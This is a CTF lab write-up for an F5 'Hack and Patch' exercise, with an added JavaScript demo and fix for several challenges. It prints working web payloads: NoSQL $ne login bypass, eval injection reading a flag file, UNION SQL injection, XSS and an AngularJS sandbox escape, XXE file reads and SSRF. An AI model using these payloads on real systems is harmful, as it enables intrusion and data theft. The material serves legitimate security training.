f5
a guest, Dec 5th, 2018
Hack and Patch

Warming up :

1. Hack : F5CTF{9120de7f620ac2bbfff8273918732a2}
2. Patch : F5CTF{8547f194fb98448a89e058e2a1f9d5a1}

Node.js & MongoDB :

1. Hack MongoDB injection :
a. In Burp, send the login with username flag and password flag
b. It is a Node.js application, so the body is JSON
i. {"username" : "flag" , "password" : "flag"}
c. Bypass authentication: the password value goes straight into the MongoDB query, so a query operator can replace the string comparison
i. JSON form : {"username" : "flag" , "password" : {"$ne": "flag"}}
ii. HTTP regular form : username=flag&password[$ne]=flag (a body parser that understands bracket notation builds the same object)
2. Patch MongoDB injection :
a. On ASM, enable all signatures.
b. Check the SQLINJ - NoSQL [$ne] signature
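How the two bypass payloads above work end to end, as an added example that is not part of the original notes or the challenge application. It assumes an Express-style login handler that builds the MongoDB filter from the request body; no database is needed because a small in-memory matcher stands in for findOne(), and parseExtendedForm() imitates the one level of bracket parsing a qs-style form parser does.

```javascript
// Added example, not the challenge's code: the login filter is built straight
// from the request body, so a client-supplied {$ne: ...} replaces the string
// comparison. Everything here is constructed and runs offline.

// Constructed user record standing in for the users collection.
const USERS = [{ username: 'flag', password: 's3cret-not-flag' }];

// Minimal evaluator for the subset of MongoDB filter semantics used here:
// a scalar condition means equality, an object with $ne means "not equal".
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === 'object') {
      if ('$ne' in cond) return doc[field] !== cond.$ne;
      throw new Error('unsupported operator in filter: ' + Object.keys(cond).join(','));
    }
    return doc[field] === cond;
  });
}

function findOne(filter) {
  return USERS.find((u) => matches(u, filter)) || null;
}

// One level of bracket notation, as qs-style "extended" form parsing does:
// password[$ne]=flag  ->  { password: { $ne: 'flag' } }
// This is what makes the "HTTP regular form" variant equivalent to the JSON one.
function parseExtendedForm(body) {
  const out = {};
  for (const pair of body.split('&')) {
    const [rawKey, rawVal = ''] = pair.split('=');
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal);
    const m = /^([^[]+)\[([^\]]+)\]$/.exec(key);
    if (m) {
      out[m[1]] = out[m[1]] || {};
      out[m[1]][m[2]] = val;
    } else {
      out[key] = val;
    }
  }
  return out;
}

// VULNERABLE: whatever type the client sent becomes part of the query.
function vulnerableLogin(body) {
  return findOne({ username: body.username, password: body.password }) !== null;
}

// FIXED: credentials must be plain strings, so no object (and therefore no
// $-operator) can reach the query. Password hashing is out of scope here.
function safeLogin(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return false; // respond 400 in a real handler
  }
  return findOne({ username, password }) !== null;
}

// The two payloads from the notes, constructed locally.
const jsonPayload = { username: 'flag', password: { $ne: 'flag' } };
const formPayload = parseExtendedForm('username=flag&password[$ne]=flag');

console.log('vulnerable:', vulnerableLogin(jsonPayload), vulnerableLogin(formPayload)); // true true
console.log('fixed:', safeLogin(jsonPayload), safeLogin(formPayload));                   // false false
console.log('fixed, real password:', safeLogin({ username: 'flag', password: 's3cret-not-flag' })); // true
```

The type check is the whole fix: a string can never carry an operator, so the query keeps its equality semantics no matter what body parser sits in front of the handler.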
3. Hack Eval is Evil
a. In Burp, send a calculation for the tip
i. POST /api/node/calc
ii. {"math":"(120 * 0.15 + 120) / 1"}
iii. Console : eval((120 * 0.15 + 120) / 1) → same result
iv. Calculated on the server side, so we can use it
b. require('fs').readFileSync("/eval/flag")) //
i. Two )) : the first closes readFileSync, the second closes the server's eval(...), then // comments out the rest of the line
4. Patch Eval is Evil
a. JavaScript Code Injection - require(); (Parameter)
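The calc endpoint and a real fix for it, as an added example that is not the challenge's code. It assumes the server evaluates the input as eval("(" + math + ")"), which is what makes a payload ending in ") //" balance: one ")" closes readFileSync, the next closes the server's wrapper, and "//" comments out the trailing ")". The payload here sets a global instead of reading /eval/flag so the effect can be observed offline; the replacement is an arithmetic-only parser, not a filtered eval.

```javascript
// Added example, not the challenge's code. Assumption: the server evaluates
// the client's expression as eval("(" + math + ")"), which is what makes the
// notes' payload need two ")" followed by "//".

// VULNERABLE handler for POST /api/node/calc: any JavaScript runs server side.
function vulnerableCalc(math) {
  return eval('(' + math + ')'); // eslint-disable-line no-eval
}

// FIXED: a recursive-descent parser that accepts numbers, + - * /, unary
// minus and parentheses. Anything else is a SyntaxError, never code.
function safeCalc(math) {
  const tokens = math.match(/\d+(?:\.\d+)?|[-+*/()]/g) || [];
  if (tokens.join('') !== math.replace(/\s+/g, '')) {
    throw new SyntaxError('only numbers, + - * / and parentheses are allowed');
  }
  let pos = 0;
  const peek = () => tokens[pos];
  const next = () => tokens[pos++];

  function primary() {
    const t = next();
    if (t === '(') {
      const v = expr();
      if (next() !== ')') throw new SyntaxError('expected )');
      return v;
    }
    if (t === '-') return -primary();
    if (t === undefined || !/^\d/.test(t)) throw new SyntaxError('expected a number, got ' + t);
    return parseFloat(t);
  }
  function term() {
    let v = primary();
    while (peek() === '*' || peek() === '/') {
      const op = next();
      const r = primary();
      v = op === '*' ? v * r : v / r;
    }
    return v;
  }
  function expr() {
    let v = term();
    while (peek() === '+' || peek() === '-') {
      const op = next();
      const r = term();
      v = op === '+' ? v + r : v - r;
    }
    return v;
  }
  const result = expr();
  if (pos !== tokens.length) throw new SyntaxError('unexpected token ' + peek());
  return result;
}

// The legitimate tip calculation from the notes.
const LEGIT = '(120 * 0.15 + 120) / 1';

// Same shape as  require('fs').readFileSync("/eval/flag")) //  (a call, the
// extra ")" that closes the server's eval, then a comment), but the side
// effect is a global we can inspect offline instead of a file read.
const PAYLOAD = "(globalThis.pwned = 'eval ran attacker code')) //";

function demo() {
  const out = {
    vulnerableLegit: vulnerableCalc(LEGIT),
    vulnerablePayload: vulnerableCalc(PAYLOAD),
    pwnedAfterwards: globalThis.pwned,
    safeLegit: safeCalc(LEGIT),
    safePayloadRejected: false,
  };
  try { safeCalc(PAYLOAD); } catch (e) { out.safePayloadRejected = e instanceof SyntaxError; }
  return out;
}
console.log(demo());
// { vulnerableLegit: 138, vulnerablePayload: 'eval ran attacker code',
//   pwnedAfterwards: 'eval ran attacker code', safeLegit: 138, safePayloadRejected: true }
```

The grammar is tiny on purpose: the safe version gives the client no way to name an identifier, so require, process or any other global is unreachable by construction rather than by blacklist.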
  30.  
Websockets :

1. Hack Authentication bypass
a. wss://udf_fqdn
i. Wrong URL → go to /admin
b. wss://udf_fqdn/admin
i. Log out on the application side if needed, to delete the cookie
2. Patch Authentication bypass
a. Create a login page on ASM
i. /login
ii. Username / password
iii. Expected response 302
iv. String NOT : /login
b. Login enforcement on /admin
3. Hack XSS over Websocket
a. Login as admin in the browser
b. Make an order to test
c. <script>alert('Pwned by Dancing Banana')</script>
d. Refresh the page if needed, re-test
e. Inspect element : you can see the <script> in the DOM, but the browser does not execute it (a script element inserted via innerHTML is not run), hence the next payload
f. <img src=/ onerror=alert(0xf5)>
4. Patch XSS over Websocket
a. onerror (signature)
5. Hack SQLi over websocket
a. Driver, 5th Ave W' order by 1 -- '
b. Should still work
c. 5th Ave W' order by 6 -- '  still OK, so at least 6 columns
d. 5th Ave W' order by 7 -- '  fails, so we have 6 columns
e. ' union select 1,2,3,4,5,6 from flag -- '
f. ' union select 1,2,3,4,flag,6 from flag -- '
6. Patch SQLi over websocket
a. Don't copy-paste, type the attack line (issue with ' and -- )
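Automating the column-count probe and the UNION payload from items 5a to 5f, as an added example that is not from the notes. The backend here is a constructed stand-in (fakeBackend) that enforces only what a real database would for these two payloads: ORDER BY must name an existing column and UNION SELECT must match the column count of the original query. The six-column query and the flag table are assumed from the notes; in practice send() would be the function that writes the websocket message and reads the reply.

```javascript
// Added example, not the challenge's code. The query shape is assumed:
//   SELECT c1,c2,c3,c4,c5,c6 FROM drivers WHERE address = '<input>'
const ORIGINAL_COLUMNS = 6;
const FLAG_ROWS = [{ flag: 'constructed-sample-flag' }]; // stands in for table "flag"

// Constructed stand-in for "send the websocket message, look at the reply".
// Returns result rows, or throws the way a database error would surface.
function fakeBackend(input) {
  const sql = `SELECT 1,2,3,4,5,6 FROM drivers WHERE address = '${input}'`;
  // Text after the closing quote of the injected value is attacker SQL;
  // drop the "-- '" comment the payload appends.
  const tail = (sql.split("'")[2] || '').replace(/--.*$/, '').trim();
  if (tail === '') return [[1, 2, 3, 4, 5, 6]]; // normal query, normal rows
  let m;
  if ((m = /^order by (\d+)$/i.exec(tail))) {
    if (Number(m[1]) < 1 || Number(m[1]) > ORIGINAL_COLUMNS) {
      throw new Error(`Unknown column '${m[1]}' in 'order clause'`);
    }
    return [[1, 2, 3, 4, 5, 6]];
  }
  if ((m = /^union select (.+) from (\w+)$/i.exec(tail))) {
    const cols = m[1].split(',').map((c) => c.trim());
    if (cols.length !== ORIGINAL_COLUMNS) {
      throw new Error('The used SELECT statements have a different number of columns');
    }
    if (m[2] !== 'flag') throw new Error(`Table '${m[2]}' doesn't exist`);
    return FLAG_ROWS.map((row) =>
      cols.map((c) => {
        if (/^\d+$/.test(c)) return Number(c);
        if (c in row) return row[c];
        throw new Error(`Unknown column '${c}' in 'field list'`);
      })
    );
  }
  throw new Error('syntax error near ' + tail);
}

// ORDER BY n succeeds while n <= column count, so the first failure gives it.
// `send` submits the injected value and throws when the backend errors.
function findColumnCount(send, knownGoodValue, max = 30) {
  for (let n = 1; n <= max; n++) {
    try {
      send(`${knownGoodValue}' order by ${n} -- '`);
    } catch (e) {
      return n - 1; // 0 means even ORDER BY 1 failed: no injection here
    }
  }
  throw new Error(`more than ${max} columns, raise max`);
}

// Same column count as the original query, with the interesting column
// placed in a position that is echoed back to the client.
function unionPayload(columnCount, position, column, table) {
  const cols = Array.from({ length: columnCount }, (_, i) =>
    i + 1 === position ? column : String(i + 1)
  );
  return `' union select ${cols.join(',')} from ${table} -- '`;
}

function run() {
  const count = findColumnCount(fakeBackend, '5th Ave W');
  const payload = unionPayload(count, 5, 'flag', 'flag');
  return { count, payload, rows: fakeBackend(payload) };
}
console.log(run());
// { count: 6, payload: "' union select 1,2,3,4,flag,6 from flag -- '",
//   rows: [ [ 1, 2, 3, 4, 'constructed-sample-flag', 6 ] ] }
```

The knownGoodValue matters: the ORDER BY probe only tells you something if the surrounding query returned rows before you touched it, which is what item 5b ("should still work") checks by hand.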
  63.  
Platform based XSS :
1. Hack JS Injection
a. Change the filter value to something and check the page source
b. Close the variable and inject the code
i. Filter= matt"; alert(0x123) //
ii. Filter= matt"; alert(0xf5) //
2. Patch JS Injection
3. Hack Angular.js injection
a. Go to a fake page /matt
b. /error?status=404&path=<123> will be escaped.
c. /error?status=404&path={{3-1}} we should see 2 in the page
d. /error?status=404&path={{1+1}} issue, does not work. Why ?
i. A + in the query string is decoded as a space, so it has to be URL-encoded as %2b
4. Hack Angular.js Sandbox bypass
a. Google sandbox escape angularjs
i. https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
b. Check the Angular version in the attacked page's source code → v1.4.8
c. {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(0xf5)//');}}
5. Patch Angular.js Sandbox bypass
  83.  
  84.  
XXE & SSRF:

1. [Hack] XXE injection
a. The contact form is sent as XML – use Burp

Original request
<?xml version="1.0" encoding="UTF-8"?>
<contact>
<name>matt</name>
<email>dier@gmail.com</email>
<phone>0125632574</phone>
<message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
</contact>

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

Attack request (declares an external entity pointing at a local file and references it in <name>)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///xxe/flag" >]>
<contact>
<name>&xxe;</name>
<email>dier@gmail.com</email>
<phone>0125632574</phone>
<message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
</contact>

Response with Flag :

2. [Patch] XXE injection
a. No idea how to retrieve the flag. No AJAX blocking page.
3. [Hack] SSRF (GET)
Same entity trick, but the SYSTEM identifier is an HTTP URL, so the server makes the request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://ssrfserver/flag" >]>
<contact>
<name>&xxe;</name>
<email>dier@gmail.com</email>
<phone>0125632574</phone>
<message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
</contact>

a. Tag :

4. [Patch] SSRF
a. No AJAX popup, but blocked
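A code-level patch for both the XXE and the SSRF request above, as an added example that is not from the notes or the challenge: a guard that runs before the XML parser and refuses DOCTYPE and ENTITY declarations, classifying the external identifier so the log shows whether it was a local file read (file:///) or an outbound request (http://). The sample documents are constructed from the requests in the notes; use a check like this only when the XML library in use cannot be told to disable entity expansion, since it is a guard in front of the parser, not a parser.

```javascript
// Added example, not the challenge's code: a guard that runs before the XML
// parser and refuses the declarations the XXE and SSRF payloads depend on.
// The sample documents below are constructed from the requests in the notes.

const CLEAN_REQUEST = `<?xml version="1.0" encoding="UTF-8"?>
<contact>
<name>matt</name>
<email>dier@gmail.com</email>
<phone>0125632574</phone>
<message>hello</message>
</contact>`;

const XXE_REQUEST = CLEAN_REQUEST
  .replace('<contact>', '<!DOCTYPE foo [\n<!ELEMENT foo ANY >\n<!ENTITY xxe SYSTEM "file:///xxe/flag" >]>\n<contact>')
  .replace('<name>matt</name>', '<name>&xxe;</name>');

const SSRF_REQUEST = XXE_REQUEST.replace('file:///xxe/flag', 'http://ssrfserver/flag');

// Is the external identifier a local read or an outbound request?
function classifyUri(uri) {
  const scheme = (/^([a-z][a-z0-9+.-]*):/i.exec(uri) || [])[1];
  if (!scheme || scheme.toLowerCase() === 'file') return 'local-file (XXE)';
  if (/^(https?|ftp)$/i.test(scheme)) return 'outbound-request (SSRF)';
  return 'other (' + scheme.toLowerCase() + ')';
}

// Returns { ok: true } for XML the contact form may legitimately send, or
// { ok: false, reason, externals } describing why it was refused.
function checkContactXml(xml) {
  // Comments and CDATA are not markup to the parser either, so ignore them.
  const s = xml.replace(/<!--[\s\S]*?-->/g, '').replace(/<!\[CDATA\[[\s\S]*?\]\]>/g, '');
  const hasDoctype = /<!DOCTYPE\b/i.test(s);
  const externals = [];
  const entityRe = /<!ENTITY\s+(%\s*)?([\w.-]+)\s+(SYSTEM|PUBLIC)\s+("[^"]*"|'[^']*')(?:\s+("[^"]*"|'[^']*'))?/gi;
  let m;
  while ((m = entityRe.exec(s))) {
    const uri = (m[5] || m[4]).slice(1, -1); // PUBLIC carries the URI in the second literal
    externals.push({ name: m[2], parameter: Boolean(m[1]), uri, kind: classifyUri(uri) });
  }
  if (hasDoctype || externals.length) {
    return {
      ok: false,
      reason: hasDoctype ? 'DOCTYPE not allowed' : 'ENTITY declaration outside DOCTYPE',
      externals,
    };
  }
  // The form never needs entities beyond the predefined five and char refs.
  const ref = /&(?!(?:amp|lt|gt|quot|apos|#\d+|#x[0-9a-f]+);)[\w.-]+;/i.exec(s);
  if (ref) return { ok: false, reason: 'undeclared entity reference ' + ref[0], externals };
  return { ok: true };
}

function demo() {
  return {
    clean: checkContactXml(CLEAN_REQUEST),
    xxe: checkContactXml(XXE_REQUEST),
    ssrf: checkContactXml(SSRF_REQUEST),
  };
}
console.log(JSON.stringify(demo(), null, 2));
```

Rejecting the whole DOCTYPE, rather than trying to allow "harmless" internal entities, is deliberate: parameter entities and nested internal entities are how the out-of-band and billion-laughs variants get past per-entity filtering.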
  134.  
  135.  
  136.  
HTML5 Elements:

1. [Hack] Media Event Injection
a. Go to Services and check the URL. We can change the width (check the source code): the value is written unquoted into the media element's attribute list
b. https://www.w3schools.com/tags/ref_eventattributes.asp
c. The oncanplay event attribute is interesting to exec something (it fires as soon as the media can be played, no click required)
d. Add the attribute after the width value

https://4997985e-a27c-4a62-a057-f51df08baea9.access.udf.f5.com/services?width=100%25 oncanplay=alert('F5')

2. [Patch] Media Event Injection
a. Check the server technology and the signature
b. Blocking page, but not able to see the flag. Issue with Tomer's JS.
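The three injection contexts used on this page (the order text pushed over the websocket, the filter value echoed into a JavaScript string, and the width written unquoted into a media element) and the output encoding that neutralises each, as one added example that is not the challenge's code. The template strings are assumed, since the page does not show the application's templates; the payloads are the ones from the notes, constructed as sample input.

```javascript
// Added example, not the challenge's code. The template strings are assumed;
// they reproduce the three contexts from the notes: HTML body (websocket
// order), JavaScript string (filter), HTML attribute (width).

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// 1. HTML body: the order text pushed to other clients over the websocket.
//    Server side, escape it; client side, assign it with textContent rather
//    than innerHTML (a <script> inserted via innerHTML does not run, which is
//    why the notes switch to <img onerror>).
function renderOrderVulnerable(order) { return `<li class="order">${order}</li>`; }
function renderOrderSafe(order) { return `<li class="order">${escapeHtml(order)}</li>`; }

// 2. JavaScript string: the filter echoed inside "..." in an inline script.
//    JSON.stringify yields a valid JS string literal, and escaping "<" keeps
//    a "</script>" inside the value from closing the script element.
function renderFilterVulnerable(filter) {
  return `<script>var filter = "${filter}";</script>`;
}
function renderFilterSafe(filter) {
  const literal = JSON.stringify(String(filter)).replace(/</g, '\\u003c');
  return `<script>var filter = ${literal};</script>`;
}

// 3. HTML attribute: validate to the type expected (pixels or a percentage)
//    and always quote the attribute; an unquoted value ends at the first
//    space, so everything after it becomes new attributes.
function renderMediaVulnerable(width) {
  return `<video width=${width} src="/media/intro.mp4" controls></video>`;
}
function renderMediaSafe(width) {
  if (!/^\d{1,4}%?$/.test(String(width))) throw new RangeError('invalid width: ' + width);
  return `<video width="${escapeHtml(width)}" src="/media/intro.mp4" controls></video>`;
}

// The notes' payloads, constructed as sample input (width is the URL-decoded
// form of width=100%25 oncanplay=alert('F5')).
const PAYLOADS = {
  order: '<img src=/ onerror=alert(0xf5)>',
  filter: 'matt"; alert(0xf5) //',
  width: "100% oncanplay=alert('F5')",
};

// Execute the inline script the way a browser would, with alert() stubbed
// so we can see whether the injected statement ran.
function runInlineScript(html) {
  const body = html.replace(/^<script>|<\/script>$/g, '');
  const alerted = [];
  const filter = new Function('alert', body + '\nreturn filter;')((x) => alerted.push(x));
  return { filter, alerted };
}

function demo() {
  let mediaSafeRejects = false;
  try { renderMediaSafe(PAYLOADS.width); } catch (e) { mediaSafeRejects = e instanceof RangeError; }
  return {
    orderVulnerableHasTag: renderOrderVulnerable(PAYLOADS.order).includes('<img'),
    orderSafeHasTag: renderOrderSafe(PAYLOADS.order).includes('<img'),
    filterVulnerable: runInlineScript(renderFilterVulnerable(PAYLOADS.filter)),
    filterSafe: runInlineScript(renderFilterSafe(PAYLOADS.filter)),
    mediaVulnerableHasHandler: / oncanplay=/.test(renderMediaVulnerable(PAYLOADS.width)),
    mediaSafeRejects,
    mediaSafeAccepts: renderMediaSafe('100%'),
  };
}
console.log(demo());
```

The point the three cases share: the encoding has to match the context the value lands in. HTML escaping alone would not have stopped the filter payload (it contains no angle brackets), and quoting alone would not have stopped a width of "100%" oncanplay=... if the quote itself were not escaped.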
  150.  
Open Redirect

1. [Hack] Server Side Redirect
a. Click on Admin and change the URL with the redirect target

https://4997985e-a27c-4a62-a057-f51df08baea9.access.udf.f5.com/login?path= https://f5.com/labs

b. Login as admin
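Validating the post-login path parameter so it can only send the user somewhere on the site, as an added example that is not the challenge's code. The parameter name "path" is from the notes and SITE_ORIGIN is the challenge host from the URL above, used only as the origin the target must stay on; the default landing page and the variant payloads are assumptions. It goes beyond the single payload in the notes to cover the protocol-relative, backslash and dot-segment forms that browsers also treat as absolute.

```javascript
// Added example, not the challenge's code. The parameter name "path" is from
// the notes; SITE_ORIGIN is the challenge host from the URL above, used only
// as the origin the target must stay on.

const SITE_ORIGIN = 'https://4997985e-a27c-4a62-a057-f51df08baea9.access.udf.f5.com';
const DEFAULT_AFTER_LOGIN = '/admin'; // assumed landing page

// Returns a same-site relative path to redirect to after login, falling back
// to the default for anything that could leave the site.
function safeRedirectTarget(path, origin = SITE_ORIGIN) {
  if (typeof path !== 'string' || path === '' || path.length > 2048) return DEFAULT_AFTER_LOGIN;
  // Only a single leading slash is a same-site path. "//host" is
  // protocol-relative and "/\host" is treated the same way by browsers.
  if (!path.startsWith('/') || /^\/[\\/]/.test(path)) return DEFAULT_AFTER_LOGIN;
  // Control characters or whitespace: header injection or parser confusion.
  if (/[\u0000-\u0020\u007f]/.test(path)) return DEFAULT_AFTER_LOGIN;
  let resolved;
  try {
    resolved = new URL(path, origin);
  } catch (e) {
    return DEFAULT_AFTER_LOGIN;
  }
  if (resolved.origin !== origin) return DEFAULT_AFTER_LOGIN;
  // Re-check after normalisation: "/..//evil.com" resolves to the path
  // "//evil.com", which a browser would again read as protocol-relative.
  const target = resolved.pathname + resolved.search + resolved.hash;
  if (target.startsWith('//')) return DEFAULT_AFTER_LOGIN;
  return target;
}

// Constructed inputs: the notes' payload plus common variants.
const SAMPLES = [
  'https://f5.com/labs',        // absolute URL from the notes
  '//f5.com/labs',              // protocol-relative
  '/\\f5.com/labs',             // backslash variant
  '/..//f5.com/labs',           // dot-segment trick
  '/admin\r\nSet-Cookie: a=b',  // header injection attempt
  '/dashboard?tab=orders#top',  // legitimate same-site target
];

function demo() {
  return Object.fromEntries(SAMPLES.map((s) => [s, safeRedirectTarget(s)]));
}
console.log(demo());
```

Returning a relative path rather than the resolved absolute URL means the Location header never names a host at all, so a later change of origin or a proxy rewriting Host cannot turn a valid target back into an external one.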